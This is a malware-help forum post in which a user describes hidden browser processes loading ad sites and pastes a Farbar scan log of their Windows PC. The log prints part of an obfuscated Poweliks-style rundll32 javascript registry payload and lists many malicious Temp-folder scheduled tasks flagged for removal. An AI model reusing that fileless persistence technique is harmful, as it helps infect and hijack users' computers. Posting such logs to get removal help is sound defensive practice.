Jump to content
Due to inclement weather in Southwest Florida, our Clearwater support team is offline. Our other offices are available to assist you, however their responses may be delayed. We appreciate your patience and understanding during this time. ×

dllhost.exe seems to take over my computer.


Recommended Posts

When I start up my computer, I can run for a few minutes without any issue. However, after a little while, I see multiple instances of dllhost.exe start in my task manager, and from there, everything falls apart. The slowdowns and other issues make the computer nearly unusable (So much so that I have to use someone else's computer to post this.). I have tried running Herd Protect and MalwareBytes, and neither worked. It happens randomly, and it seems to happen more often when I start a web browser. Regardless of if the browser is open, it opens web pages I cannot see. When I end those processes (iexplorer.exe), they come back, and they multiply. They go to various ad websites for incredibly random things. But I can't see any of this if the task manager isn't there. There are no internet explorer windows open for me to see this in. My computer just grinds to a halt.

Posting my farbar log files in my next post, and they are attached at the end of this message as well.

Link to post
Share on other sites

addition.txt

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 08-11-2014 01
Ran by Tyler at 2014-11-09 06:06:24
Running from C:\Users\Tyler\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Ace of Spades (HKLM\...\Steam App 224540) (Version:  - Jagex Limited)
Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1.377 - Adobe Systems Incorporated)
Acrobat.com (Version: 0.0.0 - Adobe Systems Incorporated) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 2.7.1.19610 - Adobe Systems Incorporated)
Adobe Community Help (HKLM\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.0.0.400 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Media Player (HKLM\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated)
Adobe Reader 9.5.5 (HKLM\...\{AC76BA86-7AD7-1033-7B44-A95000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Apple Application Support (HKLM\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{235EBB33-3DA1-46DF-AADE-9955123409CB}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Banctec Service Agreement (HKLM\...\{42D68A86-DB1C-4256-B8C9-5D0D92919AF5}) (Version: 2.0.0 - Dell Inc.)
Battle.net (HKLM\...\Battle.net) (Version:  - Blizzard Entertainment)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
Borderlands (HKLM\...\Steam App 8980) (Version:  - Gearbox Software)
Chantelise - Demo (HKLM\...\Steam App 70430) (Version:  - )
Choice Guard (Version: 1.2.87.0 - Microsoft Corporation) Hidden
Cisco EAP-FAST Module (HKLM\...\{415B2719-AD3A-4944-B404-C472DB6085B3}) (Version: 2.1.6 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM\...\{83770D14-21B9-44B3-8689-F7B523F94560}) (Version: 1.0.12 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM\...\{669C7BD8-DAA2-49B6-966C-F1E2AAE6B17E}) (Version: 1.0.13 - Cisco Systems, Inc.)
Curse (HKLM\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)
Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Dell Remote Access (HKLM\...\{F66A31D9-7831-4FBA-BA02-C411C0047CC5}) (Version: 1.0.0.0 - Dell Inc.)
Dell Support Center (Support Software) (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.2.08298 - Dell)
Dell System Detect (HKCU\...\9204f5692a8faf3b) (Version: 5.7.0.6 - Dell)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.2.115.201 - Alps Electric)
Dell Wireless WLAN Card Utility (HKLM\...\Broadcom 802.11 Application) (Version: 5.10.38.30 - Dell Inc.)
DELL0604 (Version: 1.0.0 - WildTangent) Hidden
DivX Setup (HKLM\...\DivX Setup) (Version: 2.6.1.24 - DivX, LLC)
Dual-Core Optimizer (HKLM\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )
Evolve (HKLM\...\{670B1B49-9FD3-4827-9B41-471EFF580AA8}) (Version: 1.8.8 - Echobit, LLC)
Gmask 1.70 English (HKLM\...\Gmask 1.70 English) (Version:  - )
Google Chrome (HKCU\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.25.5 - Google Inc.) Hidden
GoToAssist 8.0.0.514 (HKLM\...\GoToAssist) (Version:  - )
Graphical Analysis 3.4 (HKLM\...\{047B3D5A-3E67-429E-8A12-B204B6B31DF8}) (Version: 3.4 - Vernier Software & Technology)
Hearthstone (HKLM\...\Hearthstone) (Version:  - Blizzard Entertainment)
InstaCodecs (HKLM\...\InstaCodecs_is1) (Version: 1.0 - )
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1994 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
iTunes (HKLM\...\{5D928931-D1D2-4A93-A82D-BF60D0E7CFA5}) (Version: 12.0.1.26 - Apple Inc.)
Java 7 Update 71 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Jazz Jackrabbit 2 (HKLM\...\Jazz Jackrabbit 2) (Version:  - )
Juniper Networks, Inc. Setup Client (HKCU\...\Juniper_Setup_Client) (Version: 7.4.8.42127 - Juniper Networks, Inc.)
Juniper Networks, Inc. Setup Client Activex Control (HKLM\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks, Inc.)
Junk Mail filter update (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
KAG 0.95A (HKLM\...\King Arthur's Gold (Alpha)_is1) (Version:  - Michal Marcinkowski THD)
Katawa Shoujo (HKLM\...\Katawa Shoujo) (Version:  - )
Katawa Shoujo Act 1 (HKLM\...\Katawa Shoujo Act 1) (Version:  - )
League of Legends (HKLM\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)
League of Legends (Version: 3.0.0 - Riot Games) Hidden
LIMBO (HKLM\...\Steam App 48000) (Version:  - )
LINE (HKLM\...\LINE) (Version: 3.7.6.116 - LINE Corporation)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
MapleStory (HKLM\...\MapleStory) (Version:  - )
McAfee AntiVirus (HKLM\...\MSC) (Version: 12.8.988 - McAfee, Inc.)
McAfee Virtual Technician (HKLM\...\McAfee Virtual Technician) (Version: 6.5.0.2101 - McAfee, Inc.)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Age of Empires II (HKLM\...\Age of Empires 2.0) (Version:  - )
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
MSVCRT (Version: 14.0.1468.721 - Microsoft) Hidden
Mumble 1.2.8 (HKLM\...\{A9DBD31A-A09F-4C7E-86D1-3B21C59000D1}) (Version: 1.2.8 - Thorvald Natvig)
Nexon Game Manager (HKLM\...\{EA2DB6E0-72C5-4ef9-A3A0-E6705F4A6A9E}) (Version:  - )
NVIDIA PhysX (HKLM\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
OGA Notifier 2.0.0048.0 (Version: 2.0.0048.0 - Microsoft Corporation) Hidden
Pando Media Booster (HKLM\...\{980A182F-E0A2-4A40-94C1-AE0C1235902E}) (Version: 2.3.6.0 - Pando Networks Inc.)
Peggle Deluxe (HKLM\...\Steam App 3480) (Version:  - PopCap Games, Inc.)
Pokemon Showdown (HKLM\...\Pokemon Showdown) (Version:  - "Pokemon Showdown")
Portal (HKLM\...\Steam App 400) (Version:  - Valve)
PowerDVD (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 8.1 - Dell)
Project64 1.6 (HKLM\...\{9559F7CA-5E34-4237-A2D9-D856464AD727}) (Version: 1.6 - Project64)
Psychonauts (HKLM\...\Steam App 3830) (Version:  - Double Fine Productions, Inc.)
QuickSet (HKLM\...\{C4972073-2BFE-475D-8441-564EA97DA161}) (Version: 9.2.11 - Dell Inc.)
QuickTime (HKLM\...\{C9E14402-3631-4182-B377-6B0DFB1C0339}) (Version: 7.70.80.34 - Apple Inc.)
Recettear: An Item Shop's Tale - Demo (HKLM\...\Steam App 70410) (Version:  - EasyGameStation)
Roxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)
Shared C Run-time for x86 (Version: 10.0.0 - McAfee) Hidden
Skype™ 6.21 (HKLM\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.21.104 - Skype Technologies S.A.)
Spelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)
Star Wars Jedi Knight Jedi Academy (HKLM\...\{1EECBA68-8BE4-4076-94DF-E9ED206B1D21}) (Version:  - )
Steam (HKLM\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
System Requirements Lab Detection (HKLM\...\{23C1EA28-BA75-469D-864C-9880D35AB582}) (Version: 2.2.1.0 - Husdawg, LLC)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.8.1 - TeamSpeak Systems GmbH)
Terraria (HKLM\...\Steam App 105600) (Version:  - Re-Logic)
The Elder Scrolls Online (HKLM\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
Unity Web Player (HKCU\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unturned (HKLM\...\Steam App 304930) (Version:  - Nelson Sexton)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
VC80CRTRedist - 8.0.50727.6195 (Version: 1.2.0 - DivX, Inc) Hidden
Vindictus (HKLM\...\Steam App 212160) (Version:  - Nexon)
VLC media player (HKLM\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Voyetra Record Producer (HKLM\...\InstallShield_{28358FC7-703D-4D27-B791-B93C36650157}) (Version: 5.01.4100 - Voyetra Turtle Beach, Inc.)
Voyetra Record Producer (Version: 5.01.4100 - Voyetra Turtle Beach, Inc.) Hidden
WebM Project Directshow Filters (HKCU\...\webmdshow) (Version:  - )
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Sign-in Assistant (HKLM\...\{9422C8EA-B0C6-4197-B8FC-DC797658CA00}) (Version: 5.000.818.6 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{FDD810CA-D5E3-40E9-AB7B-36440B0D41EF}) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
WinRAR 4.00 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.00.0 - win.rar GmbH)
Xiph.Org Ogg Codecs 0.83.17220 32-bit (HKLM\...\Ogg Codecs) (Version: 0.83.17220 - Xiph.Org)
Xiph.Org Open Codecs 0.85.17777 (HKLM\...\Open Codecs) (Version: 0.85.17777 - Xiph.Org)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{035FBE31-3755-450A-A775-5E6BBD43D344}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.135\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}\InprocServer32 -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{31261F21-2B16-45EE-BEAB-07C4CFA18B65}\InprocServer32 -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.23.9\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32 -> C:\Users\Tyler\AppData\LocalLow\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (Unity Technologies ApS)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{5C65F4B0-3651-4514-B207-D10CB699B14B}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Chrome\Application\38.0.2125.111\delegate_execute.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{62A0D750-DED9-448C-B693-406B34BB0892}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.145\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{634059C0-D264-4B2C-AE80-F73E48D33E5B}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.123\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{6D7374DE-63AA-473C-8C02-60D9CDCD84C5}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.153\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.24.15\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{91EFB276-CEFE-48EC-BB3A-57795A7B4008}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.149\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.22.3\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.165\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{EB06378B-ABB6-4B3C-9B40-D488DD8A6E93}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.22.5\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.24.7\psuser.dll No File
 
==================== Restore Points  =========================
 
03-10-2014 00:14:48 Scheduled Checkpoint
04-10-2014 02:47:13 Device Driver Package Install: Apple, Inc. Universal Serial Bus controllers
05-10-2014 17:08:11 Scheduled Checkpoint
09-10-2014 21:19:18 Scheduled Checkpoint
16-10-2014 21:27:02 Installed Java 7 Update 71
17-10-2014 02:54:45 Installed System Requirements Lab Detection
17-10-2014 07:01:39 Windows Update
23-10-2014 23:24:10 Scheduled Checkpoint
01-11-2014 02:34:50 Scheduled Checkpoint
03-11-2014 23:36:57 Scheduled Checkpoint
09-11-2014 08:34:53 herdProtect before 20 removals
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2006-11-02 05:23 - 2006-09-18 16:41 - 00000761 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
::1             localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {02F3A87A-548F-47BC-BD68-5A888092064A} - \723068096 No Task File <==== ATTENTION
Task: {03F376E0-F1CB-4296-B87B-4B309DB588CD} - System32\Tasks\winupd => C:\Users\Tyler\AppData\Local\Temp:winupd.exe
Task: {0AC14CC6-C57B-4E94-AEF6-C84CDCDD4568} - System32\Tasks\GoogleUpdateTaskMachineUA1cfec4f46187060 => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-20] (Google Inc.)
Task: {1097C274-B2F3-48B9-9A33-BB93A58AE7A4} - System32\Tasks\41e4db80 => C:\Users\Tyler\AppData\Local\Temp\\setup580511104.exe <==== ATTENTION
Task: {12E04DA3-AC3E-4876-97D2-2B5068500975} - System32\Tasks\2b8cf180 => C:\Users\Tyler\AppData\Local\Temp\\setup2968322816.exe <==== ATTENTION
Task: {1E9DA8F4-3624-4D36-9935-C638BF1BF2C8} - \1854721336 No Task File <==== ATTENTION
Task: {2086FFDA-25FD-41B6-8B15-B04E039FB5A7} - System32\Tasks\3db6c280 => C:\Users\Tyler\AppData\Local\Temp\\setup2671896960.exe <==== ATTENTION
Task: {22EDF7AF-765C-481D-B0F0-F35C8E5B42D2} - System32\Tasks\1282a400 => C:\Users\Tyler\AppData\Local\Temp\\setup2020529920.exe <==== ATTENTION
Task: {2D9354A7-0098-4C70-AF65-3E9ACDE16AD8} - \2105017024 No Task File <==== ATTENTION
Task: {347B25AD-737F-4CB2-9CE4-B7143274228A} - System32\Tasks\win402b40 => C:\Users\Tyler\AppData\Local\Temp\win402b40.dat <==== ATTENTION
Task: {3F4E49C7-1C2F-4FB9-B036-D5125C75F62D} - System32\Tasks\Launch BCM WLAN Tray => C:\Windows\system32\WLTRAY.EXE [2008-12-22] (Dell Inc.)
Task: {48ED1995-0CAB-4211-A9D0-4A431EA2D062} - System32\Tasks\dd91ed80 => C:\Users\Tyler\AppData\Local\Temp\\setup731568512.exe <==== ATTENTION
Task: {4A9850DC-9325-4F8E-9F8F-BC7A334C11CC} - \612777664 No Task File <==== ATTENTION
Task: {54659C83-9DFE-4ECB-AE9D-D6527B229EF3} - \2778588544 No Task File <==== ATTENTION
Task: {5581028F-00F2-4331-AF8D-49606E3588AA} - System32\Tasks\5c3cd980 => C:\Users\Tyler\AppData\Local\Temp\\setup2856699264.exe <==== ATTENTION
Task: {5B5DF183-F14E-4E77-945A-39A2D2863E06} - \3106137952 No Task File <==== ATTENTION
Task: {62BA65A3-F904-4AC4-86ED-9C2355F937E8} - \77464128 No Task File <==== ATTENTION
Task: {635409A9-D3ED-44BA-88AC-8261B1450358} - System32\Tasks\1e723ec0 => C:\Users\Tyler\AppData\Local\Temp\\setup2709505536.exe <==== ATTENTION
Task: {65A519A5-404C-4F00-8901-FBE3928E9616} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-20] (Google Inc.)
Task: {6A669327-4173-4D1D-B406-6AC69FAD66EB} - System32\Tasks\8728f2c0 => C:\Users\Tyler\AppData\Local\Temp\\setup3760815040.exe <==== ATTENTION
Task: {6F6E9732-E8BD-467A-8947-4D956FBFB026} - System32\Tasks\c584be80 => C:\Users\Tyler\AppData\Local\Temp\\setup378817920.exe <==== ATTENTION
Task: {784E7FC3-2476-4EBB-B997-81A1F8959E44} - System32\Tasks\14770480 => C:\Users\Tyler\AppData\Local\Temp\\setup1325249920.exe <==== ATTENTION
Task: {78894A2C-9761-42DF-9B27-7560BF67DA72} - System32\Tasks\3d62c280 => C:\Users\Tyler\AppData\Local\Temp\\setup2389856640.exe <==== ATTENTION
Task: {79F67B3A-4697-46A2-BED6-B71965760E83} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000Core => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-19] (Google Inc.)
Task: {7A37EF97-DB03-409A-AA13-EE2066C8CA16} - \1837831808 No Task File <==== ATTENTION
Task: {7AC62A27-75DB-4C4B-9D97-09C9CEFD1F9A} - System32\Tasks\a9ca0c80 => C:\Users\Tyler\AppData\Local\Temp\\setup3830496640.exe <==== ATTENTION
Task: {8576719E-EA86-405E-86DB-87A849BFF5C7} - System32\Tasks\p9pl5944863637826728850 => \\?\globalroot\Device\HarddiskVolume3\Users\Tyler\AppData\Local\Temp\p9pl5944863637826728850.tmp <==== ATTENTION
Task: {8E2D0CED-A382-4C75-AE93-C0A74561308A} - System32\Tasks\ec10ca40 => C:\Users\Tyler\AppData\Local\Temp\\setup802090624.exe <==== ATTENTION
Task: {8F2D83C7-454E-498B-AA2C-76F5345946AA} - System32\Tasks\59c9e100 => C:\Users\Tyler\AppData\Local\Temp\\setup3556369856.exe <==== ATTENTION
Task: {934728FC-EE47-4533-8858-A8E13EED00E9} - System32\Tasks\AdobeAAMUpdater-1.0-Tyler-PC-Tyler => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-03-06] (Adobe Systems Incorporated)
Task: {960BD142-4858-4A58-A5B4-6941A9B56291} - \735723520 No Task File <==== ATTENTION
Task: {9CE86707-2679-4ED1-B2BC-521F4AED3520} - System32\Tasks\90bebf80 => C:\Users\Tyler\AppData\Local\Temp\\setup1903413632.exe <==== ATTENTION
Task: {9E17A182-5687-427B-B1EC-28EE0EEFAD54} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA1cfeb0948c7c370 => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-19] (Google Inc.)
